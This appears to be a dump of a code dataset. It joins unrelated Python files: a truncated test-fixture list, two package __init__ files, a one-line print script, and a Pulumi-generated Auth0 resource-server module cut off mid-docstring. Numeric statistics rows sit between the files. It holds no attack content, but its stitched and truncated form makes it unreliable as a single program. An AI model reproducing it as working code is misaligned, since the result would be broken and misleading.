b"[default]\nbranch: my-main\n[profile my-profile]\nbranch: my-master",
COMMITS,
),
(
"codecommit://my-repository-open-pr",
None,
None,
b"[default]\nbranch: my-main\n[profile my-profile]\nbranch: my-master",
COMMITS,
),
(
"codecommit://my-repository-other-open-pr",
None,
None,
b"[default]\nbranch: my-main\n[profile my-profile]\nbranch: my-master",
COMMITS,
),
]
| 27.333333 | 79 | 0.549857 | 343 | 2,788 | 4.451895 | 0.131195 | 0.141454 | 0.117878 | 0.133595 | 0.896529 | 0.883432 | 0.883432 | 0.883432 | 0.883432 | 0.883432 | 0 | 0.025781 | 0.276542 | 2,788 | 101 | 80 | 27.60396 | 0.731284 | 0 | 0 | 0.708333 | 0 | 0.135417 | 0.610832 | 0.176471 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
d989285ef8f7b7e31e1dd821affdbc92795a8d83 | 197 | py | Python | toolsql/sqlalchemy_utils/__init__.py | sslivkoff/toolsql | 7f41c3ee1b4e5a67732244ce54893fca746aa9e7 | [
"MIT"
] | null | null | null | toolsql/sqlalchemy_utils/__init__.py | sslivkoff/toolsql | 7f41c3ee1b4e5a67732244ce54893fca746aa9e7 | [
"MIT"
] | null | null | null | toolsql/sqlalchemy_utils/__init__.py | sslivkoff/toolsql | 7f41c3ee1b4e5a67732244ce54893fca746aa9e7 | [
"MIT"
] | null | null | null |
from .column_utils import *
from .conn_utils import *
from .engine_utils import *
from .metadata_utils import *
from .row_utils import *
from .statement_utils import *
from .table_utils import *
| 19.7 | 30 | 0.77665 | 28 | 197 | 5.214286 | 0.357143 | 0.527397 | 0.616438 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.152284 | 197 | 9 | 31 | 21.888889 | 0.874252 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
7965f9a944b0115e3c008ff64f1daddc08cda9d8 | 32 | py | Python | try6.py | aka-bla/sh1904work | 5d3842a4bb2fbedbdfc56c2f03af3629540c8fe4 | [
"Apache-2.0"
] | null | null | null | try6.py | aka-bla/sh1904work | 5d3842a4bb2fbedbdfc56c2f03af3629540c8fe4 | [
"Apache-2.0"
] | null | null | null | try6.py | aka-bla/sh1904work | 5d3842a4bb2fbedbdfc56c2f03af3629540c8fe4 | [
"Apache-2.0"
] | null | null | null | print("zheshiyigeceshiwenjian")
| 16 | 31 | 0.84375 | 2 | 32 | 13.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.03125 | 32 | 1 | 32 | 32 | 0.870968 | 0 | 0 | 0 | 0 | 0 | 0.6875 | 0.6875 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 8 |
797ac7f053eeeb82ab427a85f5b5fae96f4845cc | 325 | py | Python | projects/mmdet3d_plugin/models/utils/__init__.py | XiangTodayEatsWhat/detr3d | 34a47673011fe13593a3e594a376668acca8bddb | [
"MIT"
] | 237 | 2021-10-13T05:29:29.000Z | 2022-03-31T13:04:13.000Z | projects/mmdet3d_plugin/models/utils/__init__.py | XiangTodayEatsWhat/detr3d | 34a47673011fe13593a3e594a376668acca8bddb | [
"MIT"
] | 23 | 2021-10-20T13:57:27.000Z | 2022-03-30T08:03:19.000Z | projects/mmdet3d_plugin/models/utils/__init__.py | XiangTodayEatsWhat/detr3d | 34a47673011fe13593a3e594a376668acca8bddb | [
"MIT"
] | 47 | 2021-10-14T05:38:30.000Z | 2022-03-31T09:15:59.000Z | from .dgcnn_attn import DGCNNAttn
from .detr import Deformable3DDetrTransformerDecoder
from .detr3d_transformer import Detr3DTransformer, Detr3DTransformerDecoder, Detr3DCrossAtten
__all__ = ['DGCNNAttn', 'Deformable3DDetrTransformerDecoder',
'Detr3DTransformer', 'Detr3DTransformerDecoder', 'Detr3DCrossAtten']
| 46.428571 | 93 | 0.827692 | 22 | 325 | 11.954545 | 0.590909 | 0.311787 | 0.43346 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.030928 | 0.104615 | 325 | 6 | 94 | 54.166667 | 0.872852 | 0 | 0 | 0 | 0 | 0 | 0.307692 | 0.178462 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.6 | 0 | 0.6 | 0 | 1 | 0 | 1 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
79d80d7b929ca783e6014ca9338aa9d5875d403a | 38,764 | py | Python | sdk/python/pulumi_auth0/resource_server.py | kevinschoonover/pulumi-auth0 | 18a1ae8fde65291d9e49d6bbc9bb6a5b0eb5dd8a | [
"ECL-2.0",
"Apache-2.0"
] | 15 | 2020-05-19T13:46:53.000Z | 2022-02-24T05:09:57.000Z | sdk/python/pulumi_auth0/resource_server.py | kevinschoonover/pulumi-auth0 | 18a1ae8fde65291d9e49d6bbc9bb6a5b0eb5dd8a | [
"ECL-2.0",
"Apache-2.0"
] | 71 | 2020-05-18T22:56:21.000Z | 2022-03-31T15:19:49.000Z | sdk/python/pulumi_auth0/resource_server.py | kevinschoonover/pulumi-auth0 | 18a1ae8fde65291d9e49d6bbc9bb6a5b0eb5dd8a | [
"ECL-2.0",
"Apache-2.0"
] | 2 | 2021-10-30T10:06:00.000Z | 2022-02-26T02:39:40.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ResourceServerArgs', 'ResourceServer']
@pulumi.input_type
class ResourceServerArgs:
def __init__(__self__, *,
allow_offline_access: Optional[pulumi.Input[bool]] = None,
enforce_policies: Optional[pulumi.Input[bool]] = None,
identifier: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
options: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
scopes: Optional[pulumi.Input[Sequence[pulumi.Input['ResourceServerScopeArgs']]]] = None,
signing_alg: Optional[pulumi.Input[str]] = None,
signing_secret: Optional[pulumi.Input[str]] = None,
skip_consent_for_verifiable_first_party_clients: Optional[pulumi.Input[bool]] = None,
token_dialect: Optional[pulumi.Input[str]] = None,
token_lifetime: Optional[pulumi.Input[int]] = None,
token_lifetime_for_web: Optional[pulumi.Input[int]] = None,
verification_location: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a ResourceServer resource.
:param pulumi.Input[bool] allow_offline_access: Boolean. Indicates whether or not refresh tokens can be issued for this resource server.
:param pulumi.Input[bool] enforce_policies: Boolean. Indicates whether or not authorization polices are enforced.
:param pulumi.Input[str] identifier: String. Unique identifier for the resource server. Used as the audience parameter for authorization calls. Can not be changed once set.
:param pulumi.Input[str] name: String. Friendly name for the resource server. Cannot include `<` or `>` characters.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] options: Map(String). Used to store additional metadata
:param pulumi.Input[Sequence[pulumi.Input['ResourceServerScopeArgs']]] scopes: Set(Resource). List of permissions (scopes) used by this resource server. For details, see Scopes.
:param pulumi.Input[str] signing_alg: String. Algorithm used to sign JWTs. Options include `HS256` and `RS256`.
:param pulumi.Input[str] signing_secret: String. Secret used to sign tokens when using symmetric algorithms (HS256).
:param pulumi.Input[bool] skip_consent_for_verifiable_first_party_clients: Boolean. Indicates whether or not to skip user consent for applications flagged as first party.
:param pulumi.Input[str] token_dialect: String. Dialect of access tokens that should be issued for this resource server. Options include `access_token` or `access_token_authz` (includes permissions).
:param pulumi.Input[int] token_lifetime: Integer. Number of seconds during which access tokens issued for this resource server from the token endpoint remain valid.
:param pulumi.Input[int] token_lifetime_for_web: Integer. Number of seconds during which access tokens issued for this resource server via implicit or hybrid flows remain valid. Cannot be greater than the `token_lifetime` value.
:param pulumi.Input[str] verification_location: String
"""
if allow_offline_access is not None:
pulumi.set(__self__, "allow_offline_access", allow_offline_access)
if enforce_policies is not None:
pulumi.set(__self__, "enforce_policies", enforce_policies)
if identifier is not None:
pulumi.set(__self__, "identifier", identifier)
if name is not None:
pulumi.set(__self__, "name", name)
if options is not None:
pulumi.set(__self__, "options", options)
if scopes is not None:
pulumi.set(__self__, "scopes", scopes)
if signing_alg is not None:
pulumi.set(__self__, "signing_alg", signing_alg)
if signing_secret is not None:
pulumi.set(__self__, "signing_secret", signing_secret)
if skip_consent_for_verifiable_first_party_clients is not None:
pulumi.set(__self__, "skip_consent_for_verifiable_first_party_clients", skip_consent_for_verifiable_first_party_clients)
if token_dialect is not None:
pulumi.set(__self__, "token_dialect", token_dialect)
if token_lifetime is not None:
pulumi.set(__self__, "token_lifetime", token_lifetime)
if token_lifetime_for_web is not None:
pulumi.set(__self__, "token_lifetime_for_web", token_lifetime_for_web)
if verification_location is not None:
pulumi.set(__self__, "verification_location", verification_location)
@property
@pulumi.getter(name="allowOfflineAccess")
def allow_offline_access(self) -> Optional[pulumi.Input[bool]]:
"""
Boolean. Indicates whether or not refresh tokens can be issued for this resource server.
"""
return pulumi.get(self, "allow_offline_access")
@allow_offline_access.setter
def allow_offline_access(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "allow_offline_access", value)
@property
@pulumi.getter(name="enforcePolicies")
def enforce_policies(self) -> Optional[pulumi.Input[bool]]:
"""
Boolean. Indicates whether or not authorization polices are enforced.
"""
return pulumi.get(self, "enforce_policies")
@enforce_policies.setter
def enforce_policies(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enforce_policies", value)
@property
@pulumi.getter
def identifier(self) -> Optional[pulumi.Input[str]]:
"""
String. Unique identifier for the resource server. Used as the audience parameter for authorization calls. Can not be changed once set.
"""
return pulumi.get(self, "identifier")
@identifier.setter
def identifier(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "identifier", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
String. Friendly name for the resource server. Cannot include `<` or `>` characters.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def options(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Map(String). Used to store additional metadata
"""
return pulumi.get(self, "options")
@options.setter
def options(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "options", value)
@property
@pulumi.getter
def scopes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ResourceServerScopeArgs']]]]:
"""
Set(Resource). List of permissions (scopes) used by this resource server. For details, see Scopes.
"""
return pulumi.get(self, "scopes")
@scopes.setter
def scopes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ResourceServerScopeArgs']]]]):
pulumi.set(self, "scopes", value)
@property
@pulumi.getter(name="signingAlg")
def signing_alg(self) -> Optional[pulumi.Input[str]]:
"""
String. Algorithm used to sign JWTs. Options include `HS256` and `RS256`.
"""
return pulumi.get(self, "signing_alg")
@signing_alg.setter
def signing_alg(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "signing_alg", value)
@property
@pulumi.getter(name="signingSecret")
def signing_secret(self) -> Optional[pulumi.Input[str]]:
"""
String. Secret used to sign tokens when using symmetric algorithms (HS256).
"""
return pulumi.get(self, "signing_secret")
@signing_secret.setter
def signing_secret(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "signing_secret", value)
@property
@pulumi.getter(name="skipConsentForVerifiableFirstPartyClients")
def skip_consent_for_verifiable_first_party_clients(self) -> Optional[pulumi.Input[bool]]:
"""
Boolean. Indicates whether or not to skip user consent for applications flagged as first party.
"""
return pulumi.get(self, "skip_consent_for_verifiable_first_party_clients")
@skip_consent_for_verifiable_first_party_clients.setter
def skip_consent_for_verifiable_first_party_clients(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "skip_consent_for_verifiable_first_party_clients", value)
@property
@pulumi.getter(name="tokenDialect")
def token_dialect(self) -> Optional[pulumi.Input[str]]:
"""
String. Dialect of access tokens that should be issued for this resource server. Options include `access_token` or `access_token_authz` (includes permissions).
"""
return pulumi.get(self, "token_dialect")
@token_dialect.setter
def token_dialect(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "token_dialect", value)
@property
@pulumi.getter(name="tokenLifetime")
def token_lifetime(self) -> Optional[pulumi.Input[int]]:
"""
Integer. Number of seconds during which access tokens issued for this resource server from the token endpoint remain valid.
"""
return pulumi.get(self, "token_lifetime")
@token_lifetime.setter
def token_lifetime(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "token_lifetime", value)
@property
@pulumi.getter(name="tokenLifetimeForWeb")
def token_lifetime_for_web(self) -> Optional[pulumi.Input[int]]:
"""
Integer. Number of seconds during which access tokens issued for this resource server via implicit or hybrid flows remain valid. Cannot be greater than the `token_lifetime` value.
"""
return pulumi.get(self, "token_lifetime_for_web")
@token_lifetime_for_web.setter
def token_lifetime_for_web(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "token_lifetime_for_web", value)
@property
@pulumi.getter(name="verificationLocation")
def verification_location(self) -> Optional[pulumi.Input[str]]:
"""
String
"""
return pulumi.get(self, "verification_location")
@verification_location.setter
def verification_location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "verification_location", value)
@pulumi.input_type
class _ResourceServerState:
def __init__(__self__, *,
allow_offline_access: Optional[pulumi.Input[bool]] = None,
enforce_policies: Optional[pulumi.Input[bool]] = None,
identifier: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
options: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
scopes: Optional[pulumi.Input[Sequence[pulumi.Input['ResourceServerScopeArgs']]]] = None,
signing_alg: Optional[pulumi.Input[str]] = None,
signing_secret: Optional[pulumi.Input[str]] = None,
skip_consent_for_verifiable_first_party_clients: Optional[pulumi.Input[bool]] = None,
token_dialect: Optional[pulumi.Input[str]] = None,
token_lifetime: Optional[pulumi.Input[int]] = None,
token_lifetime_for_web: Optional[pulumi.Input[int]] = None,
verification_location: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering ResourceServer resources.
:param pulumi.Input[bool] allow_offline_access: Boolean. Indicates whether or not refresh tokens can be issued for this resource server.
:param pulumi.Input[bool] enforce_policies: Boolean. Indicates whether or not authorization polices are enforced.
:param pulumi.Input[str] identifier: String. Unique identifier for the resource server. Used as the audience parameter for authorization calls. Can not be changed once set.
:param pulumi.Input[str] name: String. Friendly name for the resource server. Cannot include `<` or `>` characters.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] options: Map(String). Used to store additional metadata
:param pulumi.Input[Sequence[pulumi.Input['ResourceServerScopeArgs']]] scopes: Set(Resource). List of permissions (scopes) used by this resource server. For details, see Scopes.
:param pulumi.Input[str] signing_alg: String. Algorithm used to sign JWTs. Options include `HS256` and `RS256`.
:param pulumi.Input[str] signing_secret: String. Secret used to sign tokens when using symmetric algorithms (HS256).
:param pulumi.Input[bool] skip_consent_for_verifiable_first_party_clients: Boolean. Indicates whether or not to skip user consent for applications flagged as first party.
:param pulumi.Input[str] token_dialect: String. Dialect of access tokens that should be issued for this resource server. Options include `access_token` or `access_token_authz` (includes permissions).
:param pulumi.Input[int] token_lifetime: Integer. Number of seconds during which access tokens issued for this resource server from the token endpoint remain valid.
:param pulumi.Input[int] token_lifetime_for_web: Integer. Number of seconds during which access tokens issued for this resource server via implicit or hybrid flows remain valid. Cannot be greater than the `token_lifetime` value.
:param pulumi.Input[str] verification_location: String
"""
if allow_offline_access is not None:
pulumi.set(__self__, "allow_offline_access", allow_offline_access)
if enforce_policies is not None:
pulumi.set(__self__, "enforce_policies", enforce_policies)
if identifier is not None:
pulumi.set(__self__, "identifier", identifier)
if name is not None:
pulumi.set(__self__, "name", name)
if options is not None:
pulumi.set(__self__, "options", options)
if scopes is not None:
pulumi.set(__self__, "scopes", scopes)
if signing_alg is not None:
pulumi.set(__self__, "signing_alg", signing_alg)
if signing_secret is not None:
pulumi.set(__self__, "signing_secret", signing_secret)
if skip_consent_for_verifiable_first_party_clients is not None:
pulumi.set(__self__, "skip_consent_for_verifiable_first_party_clients", skip_consent_for_verifiable_first_party_clients)
if token_dialect is not None:
pulumi.set(__self__, "token_dialect", token_dialect)
if token_lifetime is not None:
pulumi.set(__self__, "token_lifetime", token_lifetime)
if token_lifetime_for_web is not None:
pulumi.set(__self__, "token_lifetime_for_web", token_lifetime_for_web)
if verification_location is not None:
pulumi.set(__self__, "verification_location", verification_location)
@property
@pulumi.getter(name="allowOfflineAccess")
def allow_offline_access(self) -> Optional[pulumi.Input[bool]]:
"""
Boolean. Indicates whether or not refresh tokens can be issued for this resource server.
"""
return pulumi.get(self, "allow_offline_access")
@allow_offline_access.setter
def allow_offline_access(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "allow_offline_access", value)
@property
@pulumi.getter(name="enforcePolicies")
def enforce_policies(self) -> Optional[pulumi.Input[bool]]:
"""
Boolean. Indicates whether or not authorization polices are enforced.
"""
return pulumi.get(self, "enforce_policies")
@enforce_policies.setter
def enforce_policies(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enforce_policies", value)
@property
@pulumi.getter
def identifier(self) -> Optional[pulumi.Input[str]]:
"""
String. Unique identifier for the resource server. Used as the audience parameter for authorization calls. Can not be changed once set.
"""
return pulumi.get(self, "identifier")
@identifier.setter
def identifier(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "identifier", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
String. Friendly name for the resource server. Cannot include `<` or `>` characters.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def options(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Map(String). Used to store additional metadata
"""
return pulumi.get(self, "options")
@options.setter
def options(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "options", value)
@property
@pulumi.getter
def scopes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ResourceServerScopeArgs']]]]:
"""
Set(Resource). List of permissions (scopes) used by this resource server. For details, see Scopes.
"""
return pulumi.get(self, "scopes")
@scopes.setter
def scopes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ResourceServerScopeArgs']]]]):
pulumi.set(self, "scopes", value)
@property
@pulumi.getter(name="signingAlg")
def signing_alg(self) -> Optional[pulumi.Input[str]]:
"""
String. Algorithm used to sign JWTs. Options include `HS256` and `RS256`.
"""
return pulumi.get(self, "signing_alg")
@signing_alg.setter
def signing_alg(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "signing_alg", value)
@property
@pulumi.getter(name="signingSecret")
def signing_secret(self) -> Optional[pulumi.Input[str]]:
"""
String. Secret used to sign tokens when using symmetric algorithms (HS256).
"""
return pulumi.get(self, "signing_secret")
@signing_secret.setter
def signing_secret(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "signing_secret", value)
@property
@pulumi.getter(name="skipConsentForVerifiableFirstPartyClients")
def skip_consent_for_verifiable_first_party_clients(self) -> Optional[pulumi.Input[bool]]:
"""
Boolean. Indicates whether or not to skip user consent for applications flagged as first party.
"""
return pulumi.get(self, "skip_consent_for_verifiable_first_party_clients")
@skip_consent_for_verifiable_first_party_clients.setter
def skip_consent_for_verifiable_first_party_clients(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "skip_consent_for_verifiable_first_party_clients", value)
@property
@pulumi.getter(name="tokenDialect")
def token_dialect(self) -> Optional[pulumi.Input[str]]:
"""
String. Dialect of access tokens that should be issued for this resource server. Options include `access_token` or `access_token_authz` (includes permissions).
"""
return pulumi.get(self, "token_dialect")
@token_dialect.setter
def token_dialect(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "token_dialect", value)
@property
@pulumi.getter(name="tokenLifetime")
def token_lifetime(self) -> Optional[pulumi.Input[int]]:
"""
Integer. Number of seconds during which access tokens issued for this resource server from the token endpoint remain valid.
"""
return pulumi.get(self, "token_lifetime")
@token_lifetime.setter
def token_lifetime(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "token_lifetime", value)
@property
@pulumi.getter(name="tokenLifetimeForWeb")
def token_lifetime_for_web(self) -> Optional[pulumi.Input[int]]:
"""
Integer. Number of seconds during which access tokens issued for this resource server via implicit or hybrid flows remain valid. Cannot be greater than the `token_lifetime` value.
"""
return pulumi.get(self, "token_lifetime_for_web")
@token_lifetime_for_web.setter
def token_lifetime_for_web(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "token_lifetime_for_web", value)
@property
@pulumi.getter(name="verificationLocation")
def verification_location(self) -> Optional[pulumi.Input[str]]:
"""
String
"""
return pulumi.get(self, "verification_location")
@verification_location.setter
def verification_location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "verification_location", value)
class ResourceServer(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
allow_offline_access: Optional[pulumi.Input[bool]] = None,
enforce_policies: Optional[pulumi.Input[bool]] = None,
identifier: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
options: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
scopes: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ResourceServerScopeArgs']]]]] = None,
signing_alg: Optional[pulumi.Input[str]] = None,
signing_secret: Optional[pulumi.Input[str]] = None,
skip_consent_for_verifiable_first_party_clients: Optional[pulumi.Input[bool]] = None,
token_dialect: Optional[pulumi.Input[str]] = None,
token_lifetime: Optional[pulumi.Input[int]] = None,
token_lifetime_for_web: Optional[pulumi.Input[int]] = None,
verification_location: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
With this resource, you can set up APIs that can be consumed from your authorized applications.
## Example Usage
```python
import pulumi
import pulumi_auth0 as auth0
my_resource_server = auth0.ResourceServer("myResourceServer",
allow_offline_access=True,
identifier="https://api.example.com",
scopes=[
auth0.ResourceServerScopeArgs(
description="Create foos",
value="create:foo",
),
auth0.ResourceServerScopeArgs(
description="Create bars",
value="create:bar",
),
],
signing_alg="RS256",
skip_consent_for_verifiable_first_party_clients=True,
token_lifetime=8600)
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] allow_offline_access: Boolean. Indicates whether or not refresh tokens can be issued for this resource server.
:param pulumi.Input[bool] enforce_policies: Boolean. Indicates whether or not authorization polices are enforced.
:param pulumi.Input[str] identifier: String. Unique identifier for the resource server. Used as the audience parameter for authorization calls. Can not be changed once set.
:param pulumi.Input[str] name: String. Friendly name for the resource server. Cannot include `<` or `>` characters.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] options: Map(String). Used to store additional metadata
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ResourceServerScopeArgs']]]] scopes: Set(Resource). List of permissions (scopes) used by this resource server. For details, see Scopes.
:param pulumi.Input[str] signing_alg: String. Algorithm used to sign JWTs. Options include `HS256` and `RS256`.
:param pulumi.Input[str] signing_secret: String. Secret used to sign tokens when using symmetric algorithms (HS256).
:param pulumi.Input[bool] skip_consent_for_verifiable_first_party_clients: Boolean. Indicates whether or not to skip user consent for applications flagged as first party.
:param pulumi.Input[str] token_dialect: String. Dialect of access tokens that should be issued for this resource server. Options include `access_token` or `access_token_authz` (includes permissions).
:param pulumi.Input[int] token_lifetime: Integer. Number of seconds during which access tokens issued for this resource server from the token endpoint remain valid.
:param pulumi.Input[int] token_lifetime_for_web: Integer. Number of seconds during which access tokens issued for this resource server via implicit or hybrid flows remain valid. Cannot be greater than the `token_lifetime` value.
:param pulumi.Input[str] verification_location: String
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: Optional[ResourceServerArgs] = None,
opts: Optional[pulumi.ResourceOptions] = None):
"""
With this resource, you can set up APIs that can be consumed from your authorized applications.
## Example Usage
```python
import pulumi
import pulumi_auth0 as auth0
my_resource_server = auth0.ResourceServer("myResourceServer",
allow_offline_access=True,
identifier="https://api.example.com",
scopes=[
auth0.ResourceServerScopeArgs(
description="Create foos",
value="create:foo",
),
auth0.ResourceServerScopeArgs(
description="Create bars",
value="create:bar",
),
],
signing_alg="RS256",
skip_consent_for_verifiable_first_party_clients=True,
token_lifetime=8600)
```
:param str resource_name: The name of the resource.
:param ResourceServerArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ResourceServerArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
allow_offline_access: Optional[pulumi.Input[bool]] = None,
enforce_policies: Optional[pulumi.Input[bool]] = None,
identifier: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
options: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
scopes: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ResourceServerScopeArgs']]]]] = None,
signing_alg: Optional[pulumi.Input[str]] = None,
signing_secret: Optional[pulumi.Input[str]] = None,
skip_consent_for_verifiable_first_party_clients: Optional[pulumi.Input[bool]] = None,
token_dialect: Optional[pulumi.Input[str]] = None,
token_lifetime: Optional[pulumi.Input[int]] = None,
token_lifetime_for_web: Optional[pulumi.Input[int]] = None,
verification_location: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ResourceServerArgs.__new__(ResourceServerArgs)
__props__.__dict__["allow_offline_access"] = allow_offline_access
__props__.__dict__["enforce_policies"] = enforce_policies
__props__.__dict__["identifier"] = identifier
__props__.__dict__["name"] = name
__props__.__dict__["options"] = options
__props__.__dict__["scopes"] = scopes
__props__.__dict__["signing_alg"] = signing_alg
__props__.__dict__["signing_secret"] = signing_secret
__props__.__dict__["skip_consent_for_verifiable_first_party_clients"] = skip_consent_for_verifiable_first_party_clients
__props__.__dict__["token_dialect"] = token_dialect
__props__.__dict__["token_lifetime"] = token_lifetime
__props__.__dict__["token_lifetime_for_web"] = token_lifetime_for_web
__props__.__dict__["verification_location"] = verification_location
super(ResourceServer, __self__).__init__(
'auth0:index/resourceServer:ResourceServer',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
allow_offline_access: Optional[pulumi.Input[bool]] = None,
enforce_policies: Optional[pulumi.Input[bool]] = None,
identifier: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
options: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
scopes: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ResourceServerScopeArgs']]]]] = None,
signing_alg: Optional[pulumi.Input[str]] = None,
signing_secret: Optional[pulumi.Input[str]] = None,
skip_consent_for_verifiable_first_party_clients: Optional[pulumi.Input[bool]] = None,
token_dialect: Optional[pulumi.Input[str]] = None,
token_lifetime: Optional[pulumi.Input[int]] = None,
token_lifetime_for_web: Optional[pulumi.Input[int]] = None,
verification_location: Optional[pulumi.Input[str]] = None) -> 'ResourceServer':
"""
Get an existing ResourceServer resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] allow_offline_access: Boolean. Indicates whether or not refresh tokens can be issued for this resource server.
:param pulumi.Input[bool] enforce_policies: Boolean. Indicates whether or not authorization polices are enforced.
:param pulumi.Input[str] identifier: String. Unique identifier for the resource server. Used as the audience parameter for authorization calls. Can not be changed once set.
